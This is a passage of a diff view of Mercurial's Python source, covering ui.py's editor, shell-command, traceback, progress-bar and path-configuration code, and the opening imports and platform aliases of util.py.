            f.write(util.tonativeeol(text))
            f.close()

            environ = {'HGUSER': user}
            if 'transplant_source' in extra:
                environ.update({'HGREVISION': hex(extra['transplant_source'])})
            # first matching source marker wins
            for label in ('intermediate-source', 'source', 'rebase_source'):
                if label in extra:
                    environ.update({'HGREVISION': extra[label]})
                    break
            if editform:
                environ.update({'HGEDITFORM': editform})
            if pending:
                environ.update({'HG_PENDING': pending})

            editor = self.geteditor()

            self.system("%s \"%s\"" % (editor, name),
                        environ=environ,
                        onerr=error.Abort, errprefix=_("edit failed"),
                        blockedtag='editor')

            # read back whatever the editor left in the file
            f = open(name, r'rb')
            t = util.fromnativeeol(f.read())
            f.close()
        finally:
            os.unlink(name)

        return t
1464
1470
1465 def system(self, cmd, environ=None, cwd=None, onerr=None, errprefix=None,
1471 def system(self, cmd, environ=None, cwd=None, onerr=None, errprefix=None,
1466 blockedtag=None):
1472 blockedtag=None):
1467 '''execute shell command with appropriate output stream. command
1473 '''execute shell command with appropriate output stream. command
1468 output will be redirected if fout is not stdout.
1474 output will be redirected if fout is not stdout.
1469
1475
1470 if command fails and onerr is None, return status, else raise onerr
1476 if command fails and onerr is None, return status, else raise onerr
1471 object as exception.
1477 object as exception.
1472 '''
1478 '''
1473 if blockedtag is None:
1479 if blockedtag is None:
1474 # Long cmds tend to be because of an absolute path on cmd. Keep
1480 # Long cmds tend to be because of an absolute path on cmd. Keep
1475 # the tail end instead
1481 # the tail end instead
1476 cmdsuffix = cmd.translate(None, _keepalnum)[-85:]
1482 cmdsuffix = cmd.translate(None, _keepalnum)[-85:]
1477 blockedtag = 'unknown_system_' + cmdsuffix
1483 blockedtag = 'unknown_system_' + cmdsuffix
1478 out = self.fout
1484 out = self.fout
1479 if any(s[1] for s in self._bufferstates):
1485 if any(s[1] for s in self._bufferstates):
1480 out = self
1486 out = self
1481 with self.timeblockedsection(blockedtag):
1487 with self.timeblockedsection(blockedtag):
1482 rc = self._runsystem(cmd, environ=environ, cwd=cwd, out=out)
1488 rc = self._runsystem(cmd, environ=environ, cwd=cwd, out=out)
1483 if rc and onerr:
1489 if rc and onerr:
1484 errmsg = '%s %s' % (os.path.basename(cmd.split(None, 1)[0]),
1490 errmsg = '%s %s' % (os.path.basename(cmd.split(None, 1)[0]),
1485 util.explainexit(rc)[0])
1491 util.explainexit(rc)[0])
1486 if errprefix:
1492 if errprefix:
1487 errmsg = '%s: %s' % (errprefix, errmsg)
1493 errmsg = '%s: %s' % (errprefix, errmsg)
1488 raise onerr(errmsg)
1494 raise onerr(errmsg)
1489 return rc
1495 return rc
1490
1496
1491 def _runsystem(self, cmd, environ, cwd, out):
1497 def _runsystem(self, cmd, environ, cwd, out):
1492 """actually execute the given shell command (can be overridden by
1498 """actually execute the given shell command (can be overridden by
1493 extensions like chg)"""
1499 extensions like chg)"""
1494 return util.system(cmd, environ=environ, cwd=cwd, out=out)
1500 return util.system(cmd, environ=environ, cwd=cwd, out=out)
1495
1501
1496 def traceback(self, exc=None, force=False):
1502 def traceback(self, exc=None, force=False):
1497 '''print exception traceback if traceback printing enabled or forced.
1503 '''print exception traceback if traceback printing enabled or forced.
1498 only to call in exception handler. returns true if traceback
1504 only to call in exception handler. returns true if traceback
1499 printed.'''
1505 printed.'''
1500 if self.tracebackflag or force:
1506 if self.tracebackflag or force:
1501 if exc is None:
1507 if exc is None:
1502 exc = sys.exc_info()
1508 exc = sys.exc_info()
1503 cause = getattr(exc[1], 'cause', None)
1509 cause = getattr(exc[1], 'cause', None)
1504
1510
1505 if cause is not None:
1511 if cause is not None:
1506 causetb = traceback.format_tb(cause[2])
1512 causetb = traceback.format_tb(cause[2])
1507 exctb = traceback.format_tb(exc[2])
1513 exctb = traceback.format_tb(exc[2])
1508 exconly = traceback.format_exception_only(cause[0], cause[1])
1514 exconly = traceback.format_exception_only(cause[0], cause[1])
1509
1515
1510 # exclude frame where 'exc' was chained and rethrown from exctb
1516 # exclude frame where 'exc' was chained and rethrown from exctb
1511 self.write_err('Traceback (most recent call last):\n',
1517 self.write_err('Traceback (most recent call last):\n',
1512 ''.join(exctb[:-1]),
1518 ''.join(exctb[:-1]),
1513 ''.join(causetb),
1519 ''.join(causetb),
1514 ''.join(exconly))
1520 ''.join(exconly))
1515 else:
1521 else:
1516 output = traceback.format_exception(exc[0], exc[1], exc[2])
1522 output = traceback.format_exception(exc[0], exc[1], exc[2])
1517 self.write_err(encoding.strtolocal(r''.join(output)))
1523 self.write_err(encoding.strtolocal(r''.join(output)))
1518 return self.tracebackflag or force
1524 return self.tracebackflag or force
1519
1525
1520 def geteditor(self):
1526 def geteditor(self):
1521 '''return editor to use'''
1527 '''return editor to use'''
1522 if pycompat.sysplatform == 'plan9':
1528 if pycompat.sysplatform == 'plan9':
1523 # vi is the MIPS instruction simulator on Plan 9. We
1529 # vi is the MIPS instruction simulator on Plan 9. We
1524 # instead default to E to plumb commit messages to
1530 # instead default to E to plumb commit messages to
1525 # avoid confusion.
1531 # avoid confusion.
1526 editor = 'E'
1532 editor = 'E'
1527 else:
1533 else:
1528 editor = 'vi'
1534 editor = 'vi'
1529 return (encoding.environ.get("HGEDITOR") or
1535 return (encoding.environ.get("HGEDITOR") or
1530 self.config("ui", "editor", editor))
1536 self.config("ui", "editor", editor))
1531
1537
1532 @util.propertycache
1538 @util.propertycache
1533 def _progbar(self):
1539 def _progbar(self):
1534 """setup the progbar singleton to the ui object"""
1540 """setup the progbar singleton to the ui object"""
1535 if (self.quiet or self.debugflag
1541 if (self.quiet or self.debugflag
1536 or self.configbool('progress', 'disable')
1542 or self.configbool('progress', 'disable')
1537 or not progress.shouldprint(self)):
1543 or not progress.shouldprint(self)):
1538 return None
1544 return None
1539 return getprogbar(self)
1545 return getprogbar(self)
1540
1546
1541 def _progclear(self):
1547 def _progclear(self):
1542 """clear progress bar output if any. use it before any output"""
1548 """clear progress bar output if any. use it before any output"""
1543 if not haveprogbar(): # nothing loaded yet
1549 if not haveprogbar(): # nothing loaded yet
1544 return
1550 return
1545 if self._progbar is not None and self._progbar.printed:
1551 if self._progbar is not None and self._progbar.printed:
1546 self._progbar.clear()
1552 self._progbar.clear()
1547
1553
1548 def progress(self, topic, pos, item="", unit="", total=None):
1554 def progress(self, topic, pos, item="", unit="", total=None):
1549 '''show a progress message
1555 '''show a progress message
1550
1556
1551 By default a textual progress bar will be displayed if an operation
1557 By default a textual progress bar will be displayed if an operation
1552 takes too long. 'topic' is the current operation, 'item' is a
1558 takes too long. 'topic' is the current operation, 'item' is a
1553 non-numeric marker of the current position (i.e. the currently
1559 non-numeric marker of the current position (i.e. the currently
1554 in-process file), 'pos' is the current numeric position (i.e.
1560 in-process file), 'pos' is the current numeric position (i.e.
1555 revision, bytes, etc.), unit is a corresponding unit label,
1561 revision, bytes, etc.), unit is a corresponding unit label,
1556 and total is the highest expected pos.
1562 and total is the highest expected pos.
1557
1563
1558 Multiple nested topics may be active at a time.
1564 Multiple nested topics may be active at a time.
1559
1565
1560 All topics should be marked closed by setting pos to None at
1566 All topics should be marked closed by setting pos to None at
1561 termination.
1567 termination.
1562 '''
1568 '''
1563 if self._progbar is not None:
1569 if self._progbar is not None:
1564 self._progbar.progress(topic, pos, item=item, unit=unit,
1570 self._progbar.progress(topic, pos, item=item, unit=unit,
1565 total=total)
1571 total=total)
1566 if pos is None or not self.configbool('progress', 'debug'):
1572 if pos is None or not self.configbool('progress', 'debug'):
1567 return
1573 return
1568
1574
1569 if unit:
1575 if unit:
1570 unit = ' ' + unit
1576 unit = ' ' + unit
1571 if item:
1577 if item:
1572 item = ' ' + item
1578 item = ' ' + item
1573
1579
1574 if total:
1580 if total:
1575 pct = 100.0 * pos / total
1581 pct = 100.0 * pos / total
1576 self.debug('%s:%s %d/%d%s (%4.2f%%)\n'
1582 self.debug('%s:%s %d/%d%s (%4.2f%%)\n'
1577 % (topic, item, pos, total, unit, pct))
1583 % (topic, item, pos, total, unit, pct))
1578 else:
1584 else:
1579 self.debug('%s:%s %d%s\n' % (topic, item, pos, unit))
1585 self.debug('%s:%s %d%s\n' % (topic, item, pos, unit))
1580
1586
1581 def log(self, service, *msg, **opts):
1587 def log(self, service, *msg, **opts):
1582 '''hook for logging facility extensions
1588 '''hook for logging facility extensions
1583
1589
1584 service should be a readily-identifiable subsystem, which will
1590 service should be a readily-identifiable subsystem, which will
1585 allow filtering.
1591 allow filtering.
1586
1592
1587 *msg should be a newline-terminated format string to log, and
1593 *msg should be a newline-terminated format string to log, and
1588 then any values to %-format into that format string.
1594 then any values to %-format into that format string.
1589
1595
1590 **opts currently has no defined meanings.
1596 **opts currently has no defined meanings.
1591 '''
1597 '''
1592
1598
1593 def label(self, msg, label):
1599 def label(self, msg, label):
1594 '''style msg based on supplied label
1600 '''style msg based on supplied label
1595
1601
1596 If some color mode is enabled, this will add the necessary control
1602 If some color mode is enabled, this will add the necessary control
1597 characters to apply such color. In addition, 'debug' color mode adds
1603 characters to apply such color. In addition, 'debug' color mode adds
1598 markup showing which label affects a piece of text.
1604 markup showing which label affects a piece of text.
1599
1605
1600 ui.write(s, 'label') is equivalent to
1606 ui.write(s, 'label') is equivalent to
1601 ui.write(ui.label(s, 'label')).
1607 ui.write(ui.label(s, 'label')).
1602 '''
1608 '''
1603 if self._colormode is not None:
1609 if self._colormode is not None:
1604 return color.colorlabel(self, msg, label)
1610 return color.colorlabel(self, msg, label)
1605 return msg
1611 return msg
1606
1612
1607 def develwarn(self, msg, stacklevel=1, config=None):
1613 def develwarn(self, msg, stacklevel=1, config=None):
1608 """issue a developer warning message
1614 """issue a developer warning message
1609
1615
1610 Use 'stacklevel' to report the offender some layers further up in the
1616 Use 'stacklevel' to report the offender some layers further up in the
1611 stack.
1617 stack.
1612 """
1618 """
1613 if not self.configbool('devel', 'all-warnings'):
1619 if not self.configbool('devel', 'all-warnings'):
1614 if config is None or not self.configbool('devel', config):
1620 if config is None or not self.configbool('devel', config):
1615 return
1621 return
1616 msg = 'devel-warn: ' + msg
1622 msg = 'devel-warn: ' + msg
1617 stacklevel += 1 # get in develwarn
1623 stacklevel += 1 # get in develwarn
1618 if self.tracebackflag:
1624 if self.tracebackflag:
1619 util.debugstacktrace(msg, stacklevel, self.ferr, self.fout)
1625 util.debugstacktrace(msg, stacklevel, self.ferr, self.fout)
1620 self.log('develwarn', '%s at:\n%s' %
1626 self.log('develwarn', '%s at:\n%s' %
1621 (msg, ''.join(util.getstackframes(stacklevel))))
1627 (msg, ''.join(util.getstackframes(stacklevel))))
1622 else:
1628 else:
1623 curframe = inspect.currentframe()
1629 curframe = inspect.currentframe()
1624 calframe = inspect.getouterframes(curframe, 2)
1630 calframe = inspect.getouterframes(curframe, 2)
1625 fname, lineno, fmsg = calframe[stacklevel][1:4]
1631 fname, lineno, fmsg = calframe[stacklevel][1:4]
1626 fname, fmsg = pycompat.sysbytes(fname), pycompat.sysbytes(fmsg)
1632 fname, fmsg = pycompat.sysbytes(fname), pycompat.sysbytes(fmsg)
1627 self.write_err('%s at: %s:%d (%s)\n'
1633 self.write_err('%s at: %s:%d (%s)\n'
1628 % (msg, fname, lineno, fmsg))
1634 % (msg, fname, lineno, fmsg))
1629 self.log('develwarn', '%s at: %s:%d (%s)\n',
1635 self.log('develwarn', '%s at: %s:%d (%s)\n',
1630 msg, fname, lineno, fmsg)
1636 msg, fname, lineno, fmsg)
1631 curframe = calframe = None # avoid cycles
1637 curframe = calframe = None # avoid cycles
1632
1638
1633 def deprecwarn(self, msg, version, stacklevel=2):
1639 def deprecwarn(self, msg, version, stacklevel=2):
1634 """issue a deprecation warning
1640 """issue a deprecation warning
1635
1641
1636 - msg: message explaining what is deprecated and how to upgrade,
1642 - msg: message explaining what is deprecated and how to upgrade,
1637 - version: last version where the API will be supported,
1643 - version: last version where the API will be supported,
1638 """
1644 """
1639 if not (self.configbool('devel', 'all-warnings')
1645 if not (self.configbool('devel', 'all-warnings')
1640 or self.configbool('devel', 'deprec-warn')):
1646 or self.configbool('devel', 'deprec-warn')):
1641 return
1647 return
1642 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
1648 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
1643 " update your code.)") % version
1649 " update your code.)") % version
1644 self.develwarn(msg, stacklevel=stacklevel, config='deprec-warn')
1650 self.develwarn(msg, stacklevel=stacklevel, config='deprec-warn')
1645
1651
1646 def exportableenviron(self):
1652 def exportableenviron(self):
1647 """The environment variables that are safe to export, e.g. through
1653 """The environment variables that are safe to export, e.g. through
1648 hgweb.
1654 hgweb.
1649 """
1655 """
1650 return self._exportableenviron
1656 return self._exportableenviron
1651
1657
1652 @contextlib.contextmanager
1658 @contextlib.contextmanager
1653 def configoverride(self, overrides, source=""):
1659 def configoverride(self, overrides, source=""):
1654 """Context manager for temporary config overrides
1660 """Context manager for temporary config overrides
1655 `overrides` must be a dict of the following structure:
1661 `overrides` must be a dict of the following structure:
1656 {(section, name) : value}"""
1662 {(section, name) : value}"""
1657 backups = {}
1663 backups = {}
1658 try:
1664 try:
1659 for (section, name), value in overrides.items():
1665 for (section, name), value in overrides.items():
1660 backups[(section, name)] = self.backupconfig(section, name)
1666 backups[(section, name)] = self.backupconfig(section, name)
1661 self.setconfig(section, name, value, source)
1667 self.setconfig(section, name, value, source)
1662 yield
1668 yield
1663 finally:
1669 finally:
1664 for __, backup in backups.items():
1670 for __, backup in backups.items():
1665 self.restoreconfig(backup)
1671 self.restoreconfig(backup)
1666 # just restoring ui.quiet config to the previous value is not enough
1672 # just restoring ui.quiet config to the previous value is not enough
1667 # as it does not update ui.quiet class member
1673 # as it does not update ui.quiet class member
1668 if ('ui', 'quiet') in overrides:
1674 if ('ui', 'quiet') in overrides:
1669 self.fixconfig(section='ui')
1675 self.fixconfig(section='ui')
1670
1676
1671 class paths(dict):
1677 class paths(dict):
1672 """Represents a collection of paths and their configs.
1678 """Represents a collection of paths and their configs.
1673
1679
1674 Data is initially derived from ui instances and the config files they have
1680 Data is initially derived from ui instances and the config files they have
1675 loaded.
1681 loaded.
1676 """
1682 """
1677 def __init__(self, ui):
1683 def __init__(self, ui):
1678 dict.__init__(self)
1684 dict.__init__(self)
1679
1685
1680 for name, loc in ui.configitems('paths', ignoresub=True):
1686 for name, loc in ui.configitems('paths', ignoresub=True):
1681 # No location is the same as not existing.
1687 # No location is the same as not existing.
1682 if not loc:
1688 if not loc:
1683 continue
1689 continue
1684 loc, sub = ui.configsuboptions('paths', name)
1690 loc, sub = ui.configsuboptions('paths', name)
1685 self[name] = path(ui, name, rawloc=loc, suboptions=sub)
1691 self[name] = path(ui, name, rawloc=loc, suboptions=sub)
1686
1692
1687 def getpath(self, name, default=None):
1693 def getpath(self, name, default=None):
1688 """Return a ``path`` from a string, falling back to default.
1694 """Return a ``path`` from a string, falling back to default.
1689
1695
1690 ``name`` can be a named path or locations. Locations are filesystem
1696 ``name`` can be a named path or locations. Locations are filesystem
1691 paths or URIs.
1697 paths or URIs.
1692
1698
1693 Returns None if ``name`` is not a registered path, a URI, or a local
1699 Returns None if ``name`` is not a registered path, a URI, or a local
1694 path to a repo.
1700 path to a repo.
1695 """
1701 """
1696 # Only fall back to default if no path was requested.
1702 # Only fall back to default if no path was requested.
1697 if name is None:
1703 if name is None:
1698 if not default:
1704 if not default:
1699 default = ()
1705 default = ()
1700 elif not isinstance(default, (tuple, list)):
1706 elif not isinstance(default, (tuple, list)):
1701 default = (default,)
1707 default = (default,)
1702 for k in default:
1708 for k in default:
1703 try:
1709 try:
1704 return self[k]
1710 return self[k]
1705 except KeyError:
1711 except KeyError:
1706 continue
1712 continue
1707 return None
1713 return None
1708
1714
1709 # Most likely empty string.
1715 # Most likely empty string.
1710 # This may need to raise in the future.
1716 # This may need to raise in the future.
1711 if not name:
1717 if not name:
1712 return None
1718 return None
1713
1719
1714 try:
1720 try:
1715 return self[name]
1721 return self[name]
1716 except KeyError:
1722 except KeyError:
1717 # Try to resolve as a local path or URI.
1723 # Try to resolve as a local path or URI.
1718 try:
1724 try:
1719 # We don't pass sub-options in, so no need to pass ui instance.
1725 # We don't pass sub-options in, so no need to pass ui instance.
1720 return path(None, None, rawloc=name)
1726 return path(None, None, rawloc=name)
1721 except ValueError:
1727 except ValueError:
1722 raise error.RepoError(_('repository %s does not exist') %
1728 raise error.RepoError(_('repository %s does not exist') %
1723 name)
1729 name)
1724
1730
1725 _pathsuboptions = {}
1731 _pathsuboptions = {}
1726
1732
1727 def pathsuboption(option, attr):
1733 def pathsuboption(option, attr):
1728 """Decorator used to declare a path sub-option.
1734 """Decorator used to declare a path sub-option.
1729
1735
1730 Arguments are the sub-option name and the attribute it should set on
1736 Arguments are the sub-option name and the attribute it should set on
1731 ``path`` instances.
1737 ``path`` instances.
1732
1738
1733 The decorated function will receive as arguments a ``ui`` instance,
1739 The decorated function will receive as arguments a ``ui`` instance,
1734 ``path`` instance, and the string value of this option from the config.
1740 ``path`` instance, and the string value of this option from the config.
1735 The function should return the value that will be set on the ``path``
1741 The function should return the value that will be set on the ``path``
1736 instance.
1742 instance.
1737
1743
1738 This decorator can be used to perform additional verification of
1744 This decorator can be used to perform additional verification of
1739 sub-options and to change the type of sub-options.
1745 sub-options and to change the type of sub-options.
1740 """
1746 """
1741 def register(func):
1747 def register(func):
1742 _pathsuboptions[option] = (attr, func)
1748 _pathsuboptions[option] = (attr, func)
1743 return func
1749 return func
1744 return register
1750 return register
1745
1751
1746 @pathsuboption('pushurl', 'pushloc')
1752 @pathsuboption('pushurl', 'pushloc')
1747 def pushurlpathoption(ui, path, value):
1753 def pushurlpathoption(ui, path, value):
1748 u = util.url(value)
1754 u = util.url(value)
1749 # Actually require a URL.
1755 # Actually require a URL.
1750 if not u.scheme:
1756 if not u.scheme:
1751 ui.warn(_('(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
1757 ui.warn(_('(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
1752 return None
1758 return None
1753
1759
1754 # Don't support the #foo syntax in the push URL to declare branch to
1760 # Don't support the #foo syntax in the push URL to declare branch to
1755 # push.
1761 # push.
1756 if u.fragment:
1762 if u.fragment:
1757 ui.warn(_('("#fragment" in paths.%s:pushurl not supported; '
1763 ui.warn(_('("#fragment" in paths.%s:pushurl not supported; '
1758 'ignoring)\n') % path.name)
1764 'ignoring)\n') % path.name)
1759 u.fragment = None
1765 u.fragment = None
1760
1766
1761 return bytes(u)
1767 return bytes(u)
1762
1768
1763 @pathsuboption('pushrev', 'pushrev')
1769 @pathsuboption('pushrev', 'pushrev')
1764 def pushrevpathoption(ui, path, value):
1770 def pushrevpathoption(ui, path, value):
1765 return value
1771 return value
1766
1772
1767 class path(object):
1773 class path(object):
1768 """Represents an individual path and its configuration."""
1774 """Represents an individual path and its configuration."""
1769
1775
1770 def __init__(self, ui, name, rawloc=None, suboptions=None):
1776 def __init__(self, ui, name, rawloc=None, suboptions=None):
1771 """Construct a path from its config options.
1777 """Construct a path from its config options.
1772
1778
1773 ``ui`` is the ``ui`` instance the path is coming from.
1779 ``ui`` is the ``ui`` instance the path is coming from.
1774 ``name`` is the symbolic name of the path.
1780 ``name`` is the symbolic name of the path.
1775 ``rawloc`` is the raw location, as defined in the config.
1781 ``rawloc`` is the raw location, as defined in the config.
1776 ``pushloc`` is the raw locations pushes should be made to.
1782 ``pushloc`` is the raw locations pushes should be made to.
1777
1783
1778 If ``name`` is not defined, we require that the location be a) a local
1784 If ``name`` is not defined, we require that the location be a) a local
1779 filesystem path with a .hg directory or b) a URL. If not,
1785 filesystem path with a .hg directory or b) a URL. If not,
1780 ``ValueError`` is raised.
1786 ``ValueError`` is raised.
1781 """
1787 """
1782 if not rawloc:
1788 if not rawloc:
1783 raise ValueError('rawloc must be defined')
1789 raise ValueError('rawloc must be defined')
1784
1790
1785 # Locations may define branches via syntax <base>#<branch>.
1791 # Locations may define branches via syntax <base>#<branch>.
1786 u = util.url(rawloc)
1792 u = util.url(rawloc)
1787 branch = None
1793 branch = None
1788 if u.fragment:
1794 if u.fragment:
1789 branch = u.fragment
1795 branch = u.fragment
1790 u.fragment = None
1796 u.fragment = None
1791
1797
1792 self.url = u
1798 self.url = u
1793 self.branch = branch
1799 self.branch = branch
1794
1800
1795 self.name = name
1801 self.name = name
1796 self.rawloc = rawloc
1802 self.rawloc = rawloc
1797 self.loc = '%s' % u
1803 self.loc = '%s' % u
1798
1804
1799 # When given a raw location but not a symbolic name, validate the
1805 # When given a raw location but not a symbolic name, validate the
1800 # location is valid.
1806 # location is valid.
1801 if not name and not u.scheme and not self._isvalidlocalpath(self.loc):
1807 if not name and not u.scheme and not self._isvalidlocalpath(self.loc):
1802 raise ValueError('location is not a URL or path to a local '
1808 raise ValueError('location is not a URL or path to a local '
1803 'repo: %s' % rawloc)
1809 'repo: %s' % rawloc)
1804
1810
1805 suboptions = suboptions or {}
1811 suboptions = suboptions or {}
1806
1812
1807 # Now process the sub-options. If a sub-option is registered, its
1813 # Now process the sub-options. If a sub-option is registered, its
1808 # attribute will always be present. The value will be None if there
1814 # attribute will always be present. The value will be None if there
1809 # was no valid sub-option.
1815 # was no valid sub-option.
1810 for suboption, (attr, func) in _pathsuboptions.iteritems():
1816 for suboption, (attr, func) in _pathsuboptions.iteritems():
1811 if suboption not in suboptions:
1817 if suboption not in suboptions:
1812 setattr(self, attr, None)
1818 setattr(self, attr, None)
1813 continue
1819 continue
1814
1820
1815 value = func(ui, self, suboptions[suboption])
1821 value = func(ui, self, suboptions[suboption])
1816 setattr(self, attr, value)
1822 setattr(self, attr, value)
1817
1823
1818 def _isvalidlocalpath(self, path):
1824 def _isvalidlocalpath(self, path):
1819 """Returns True if the given path is a potentially valid repository.
1825 """Returns True if the given path is a potentially valid repository.
1820 This is its own function so that extensions can change the definition of
1826 This is its own function so that extensions can change the definition of
1821 'valid' in this case (like when pulling from a git repo into a hg
1827 'valid' in this case (like when pulling from a git repo into a hg
1822 one)."""
1828 one)."""
1823 return os.path.isdir(os.path.join(path, '.hg'))
1829 return os.path.isdir(os.path.join(path, '.hg'))
1824
1830
1825 @property
1831 @property
1826 def suboptions(self):
1832 def suboptions(self):
1827 """Return sub-options and their values for this path.
1833 """Return sub-options and their values for this path.
1828
1834
1829 This is intended to be used for presentation purposes.
1835 This is intended to be used for presentation purposes.
1830 """
1836 """
1831 d = {}
1837 d = {}
1832 for subopt, (attr, _func) in _pathsuboptions.iteritems():
1838 for subopt, (attr, _func) in _pathsuboptions.iteritems():
1833 value = getattr(self, attr)
1839 value = getattr(self, attr)
1834 if value is not None:
1840 if value is not None:
1835 d[subopt] = value
1841 d[subopt] = value
1836 return d
1842 return d
1837
1843
1838 # we instantiate one globally shared progress bar to avoid
1844 # we instantiate one globally shared progress bar to avoid
1839 # competing progress bars when multiple UI objects get created
1845 # competing progress bars when multiple UI objects get created
1840 _progresssingleton = None
1846 _progresssingleton = None
1841
1847
1842 def getprogbar(ui):
1848 def getprogbar(ui):
1843 global _progresssingleton
1849 global _progresssingleton
1844 if _progresssingleton is None:
1850 if _progresssingleton is None:
1845 # passing 'ui' object to the singleton is fishy,
1851 # passing 'ui' object to the singleton is fishy,
1846 # this is how the extension used to work but feel free to rework it.
1852 # this is how the extension used to work but feel free to rework it.
1847 _progresssingleton = progress.progbar(ui)
1853 _progresssingleton = progress.progbar(ui)
1848 return _progresssingleton
1854 return _progresssingleton
1849
1855
1850 def haveprogbar():
1856 def haveprogbar():
1851 return _progresssingleton is not None
1857 return _progresssingleton is not None
@@ -1,4063 +1,4055
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import codecs
20 import codecs
21 import collections
21 import collections
22 import contextlib
22 import contextlib
23 import errno
23 import errno
24 import gc
24 import gc
25 import hashlib
25 import hashlib
26 import imp
26 import imp
27 import io
27 import io
28 import itertools
28 import itertools
29 import mmap
29 import mmap
30 import os
30 import os
31 import platform as pyplatform
31 import platform as pyplatform
32 import re as remod
32 import re as remod
33 import shutil
33 import shutil
34 import signal
34 import signal
35 import socket
35 import socket
36 import stat
36 import stat
37 import string
37 import string
38 import subprocess
38 import subprocess
39 import sys
39 import sys
40 import tempfile
40 import tempfile
41 import textwrap
41 import textwrap
42 import time
42 import time
43 import traceback
43 import traceback
44 import warnings
44 import warnings
45 import zlib
45 import zlib
46
46
47 from . import (
47 from . import (
48 encoding,
48 encoding,
49 error,
49 error,
50 i18n,
50 i18n,
51 node as nodemod,
51 node as nodemod,
52 policy,
52 policy,
53 pycompat,
53 pycompat,
54 urllibcompat,
54 urllibcompat,
55 )
55 )
56 from .utils import dateutil
56 from .utils import dateutil
57
57
58 base85 = policy.importmod(r'base85')
58 base85 = policy.importmod(r'base85')
59 osutil = policy.importmod(r'osutil')
59 osutil = policy.importmod(r'osutil')
60 parsers = policy.importmod(r'parsers')
60 parsers = policy.importmod(r'parsers')
61
61
62 b85decode = base85.b85decode
62 b85decode = base85.b85decode
63 b85encode = base85.b85encode
63 b85encode = base85.b85encode
64
64
65 cookielib = pycompat.cookielib
65 cookielib = pycompat.cookielib
66 empty = pycompat.empty
66 empty = pycompat.empty
67 httplib = pycompat.httplib
67 httplib = pycompat.httplib
68 pickle = pycompat.pickle
68 pickle = pycompat.pickle
69 queue = pycompat.queue
69 queue = pycompat.queue
70 socketserver = pycompat.socketserver
70 socketserver = pycompat.socketserver
71 stderr = pycompat.stderr
71 stderr = pycompat.stderr
72 stdin = pycompat.stdin
72 stdin = pycompat.stdin
73 stdout = pycompat.stdout
73 stdout = pycompat.stdout
74 stringio = pycompat.stringio
74 stringio = pycompat.stringio
75 xmlrpclib = pycompat.xmlrpclib
75 xmlrpclib = pycompat.xmlrpclib
76
76
77 httpserver = urllibcompat.httpserver
77 httpserver = urllibcompat.httpserver
78 urlerr = urllibcompat.urlerr
78 urlerr = urllibcompat.urlerr
79 urlreq = urllibcompat.urlreq
79 urlreq = urllibcompat.urlreq
80
80
81 # workaround for win32mbcs
81 # workaround for win32mbcs
82 _filenamebytestr = pycompat.bytestr
82 _filenamebytestr = pycompat.bytestr
83
83
84 def isatty(fp):
84 def isatty(fp):
85 try:
85 try:
86 return fp.isatty()
86 return fp.isatty()
87 except AttributeError:
87 except AttributeError:
88 return False
88 return False
89
89
90 # glibc determines buffering on first write to stdout - if we replace a TTY
90 # glibc determines buffering on first write to stdout - if we replace a TTY
91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 # buffering
92 # buffering
93 if isatty(stdout):
93 if isatty(stdout):
94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95
95
96 if pycompat.iswindows:
96 if pycompat.iswindows:
97 from . import windows as platform
97 from . import windows as platform
98 stdout = platform.winstdout(stdout)
98 stdout = platform.winstdout(stdout)
99 else:
99 else:
100 from . import posix as platform
100 from . import posix as platform
101
101
102 _ = i18n._
102 _ = i18n._
103
103
104 bindunixsocket = platform.bindunixsocket
104 bindunixsocket = platform.bindunixsocket
105 cachestat = platform.cachestat
105 cachestat = platform.cachestat
106 checkexec = platform.checkexec
106 checkexec = platform.checkexec
107 checklink = platform.checklink
107 checklink = platform.checklink
108 copymode = platform.copymode
108 copymode = platform.copymode
109 executablepath = platform.executablepath
109 executablepath = platform.executablepath
110 expandglobs = platform.expandglobs
110 expandglobs = platform.expandglobs
111 explainexit = platform.explainexit
111 explainexit = platform.explainexit
112 findexe = platform.findexe
112 findexe = platform.findexe
113 getfsmountpoint = platform.getfsmountpoint
113 getfsmountpoint = platform.getfsmountpoint
114 getfstype = platform.getfstype
114 getfstype = platform.getfstype
115 gethgcmd = platform.gethgcmd
115 gethgcmd = platform.gethgcmd
116 getuser = platform.getuser
116 getuser = platform.getuser
117 getpid = os.getpid
117 getpid = os.getpid
118 groupmembers = platform.groupmembers
118 groupmembers = platform.groupmembers
119 groupname = platform.groupname
119 groupname = platform.groupname
120 hidewindow = platform.hidewindow
120 hidewindow = platform.hidewindow
121 isexec = platform.isexec
121 isexec = platform.isexec
122 isowner = platform.isowner
122 isowner = platform.isowner
123 listdir = osutil.listdir
123 listdir = osutil.listdir
124 localpath = platform.localpath
124 localpath = platform.localpath
125 lookupreg = platform.lookupreg
125 lookupreg = platform.lookupreg
126 makedir = platform.makedir
126 makedir = platform.makedir
127 nlinks = platform.nlinks
127 nlinks = platform.nlinks
128 normpath = platform.normpath
128 normpath = platform.normpath
129 normcase = platform.normcase
129 normcase = platform.normcase
130 normcasespec = platform.normcasespec
130 normcasespec = platform.normcasespec
131 normcasefallback = platform.normcasefallback
131 normcasefallback = platform.normcasefallback
132 openhardlinks = platform.openhardlinks
